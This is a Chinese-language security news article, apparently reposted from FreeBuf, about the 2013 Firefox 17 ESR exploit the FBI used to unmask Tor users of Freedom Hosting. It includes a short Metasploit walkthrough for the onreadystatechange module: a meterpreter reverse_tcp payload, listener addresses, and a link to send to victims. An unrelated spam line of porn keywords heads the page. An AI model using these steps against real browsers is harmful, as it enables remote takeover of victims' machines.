自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

作者:litdg
安全
Tor網(wǎng)絡(luò)是一種允許用戶匿名訪問(wèn)網(wǎng)站和其他服務(wù)的網(wǎng)絡(luò)。在這個(gè)網(wǎng)絡(luò)中,存在一種稱(chēng)為黑暗網(wǎng)絡(luò)(darknet)的服務(wù),從論壇到電子郵件都有,這些服務(wù)是只有通過(guò)tor才可以訪問(wèn)。

Tor網(wǎng)絡(luò)是一種允許用戶匿名訪問(wèn)網(wǎng)站和其他服務(wù)的網(wǎng)絡(luò)。在這個(gè)網(wǎng)絡(luò)中,存在一種稱(chēng)為黑暗網(wǎng)絡(luò)(darknet)的服務(wù),從論壇到電子郵件都有,這些服務(wù)是只有通過(guò)tor才可以訪問(wèn)。

Tor通過(guò)志愿者提供的3000多個(gè)中繼傳輸網(wǎng)絡(luò)流量從而隱藏真實(shí)用戶的位置信息。盡管Tor網(wǎng)絡(luò)上的很多服務(wù)都是清白的,但是它的匿名性也吸引了很多具有犯罪意圖的人,比如傳播兒童色情的組織。

出生于美國(guó)的Eric Eoin Marques居住在愛(ài)爾蘭的都柏林,他是Freedom Hosting的首席架構(gòu)師,而Freedom Hosting在歐洲的550臺(tái)服務(wù)器被指控用來(lái)托管兒童色情網(wǎng)站。

Freedom Hosting就是Tor網(wǎng)絡(luò)上的一個(gè)重要的服務(wù)提供商。它的服務(wù)只能通過(guò)tor網(wǎng)絡(luò)來(lái)訪問(wèn)。因?yàn)樗嫦舆`法的事情,所以Tor的負(fù)責(zé)人還特地發(fā)表過(guò)聲明,稱(chēng)他們跟運(yùn)營(yíng)Freedom Hosting的人沒(méi)有任何關(guān)系。聲明如下:

“運(yùn)營(yíng)Freedom Hosting的人或組織跟開(kāi)發(fā)Tor軟件的團(tuán)隊(duì)沒(méi)有任何關(guān)聯(lián)和隸屬關(guān)系。過(guò)去,曾有敵對(duì)的組織試圖繞過(guò)tor隱藏的服務(wù),直接攻擊tor網(wǎng)絡(luò)背后服務(wù)器上的軟件。通常都是利用php,mysql和其他的軟件的漏洞而不是tor本身的漏洞。最近有消息表明,有人成功利用了Freedom Hosting背后的軟件漏洞。據(jù)我們所知是利用了Firefox 17 ESR的一個(gè)bug,tor瀏覽器就是基于這個(gè)firefox版本的。我們會(huì)研究這些bug,并盡快修復(fù)他們。

FBI利用了firefox17的一個(gè)漏洞,成功追蹤到了Freedom Hosting的服務(wù)器。它使用的payload是收集電腦的MAC地址和hostname,然后通過(guò)http協(xié)議發(fā)送到自己控制的服務(wù)器上從而獲得真實(shí)的ip地址。

Mozilla Firefox 小于22.0的版本,F(xiàn)irefox ESR 17.x,小于17.07的版本,Thunderbird ESR 17.x,小于17.07的版本沒(méi)有妥善的處理onreadystatechange事件,導(dǎo)致遠(yuǎn)程攻擊者可以拒絕服務(wù)攻擊(程序crash)或者可能執(zhí)行任意代碼。

2013年8月份的時(shí)候就已經(jīng)有人在利用這個(gè)漏洞攻擊Tor browser的用戶了?,F(xiàn)在msf上已經(jīng)有利用模塊,針對(duì)firefox17.06.模塊使用說(shuō)明:

windows/browser/mozilla_firefox_onreadystatechange:

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

輸入show options檢查這個(gè)exp的配置項(xiàng)

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

SRVHOST是msf本機(jī)的地址,這里配置命令是set SRVHOST 192.168.0.3

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

然后設(shè)置payloadset PAYLOAD windows/meterpreter/reverse_tcp

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

輸入show options查看payload的配置項(xiàng)

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

設(shè)置接受反彈shell的地址 set LHOST 192.168.0.103

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

輸入run命令開(kāi)始監(jiān)聽(tīng):

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

只要讓受害者訪問(wèn)這個(gè)exp生成的鏈接就可以了.這里是http://192.168.0.103:8080/2Hek0bdO

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

如果對(duì)方的瀏覽器存在漏洞可以看到msf的輸出如下:

FBI追蹤Tor用戶使用的Firefox漏洞利用程序

參考資料:

http://rt.com/usa/fbi-exploiting-tor-child-porn-842/

http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/

http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html

http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange

via http://resources.infosecinstitute.com 翻譯整理by litdg@freebuf

責(zé)任編輯:藍(lán)雨淚 來(lái)源: FreebuF
Tor網(wǎng)絡(luò)Firefox漏洞
相關(guān)推薦

2013-10-29 16:24:10

FirefoxLightbeam

2013-11-12 13:09:46

2017-03-01 15:18:16

2020-05-13 15:00:25

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2024-11-27 16:39:54

2021-04-16 10:31:41

FBI漏洞黑客

2017-11-08 10:05:17

2021-09-26 05:50:06

Zoho漏洞CISAAPT組織

2021-07-15 17:48:11

Tor項(xiàng)目Arti開(kāi)發(fā)者

2012-02-24 09:31:42

Firefox功能

2023-06-09 07:11:56

2023-08-04 23:50:56

2024-09-20 15:29:37

2019-07-05 18:06:18

ffsendFirefox SenLinux

2015-08-25 14:55:40

2015-02-06 15:51:11

2009-09-15 23:40:52

2022-05-30 16:39:22

TailsLinuxLinux 發(fā)行版

2009-11-05 12:04:48

2015-11-09 15:32:34

TorTor網(wǎng)絡(luò)隱私網(wǎng)絡(luò)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)